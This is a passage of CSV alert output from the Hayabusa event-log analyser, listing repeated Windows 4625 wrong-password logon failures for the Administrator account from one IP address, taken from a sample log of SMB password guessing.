NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 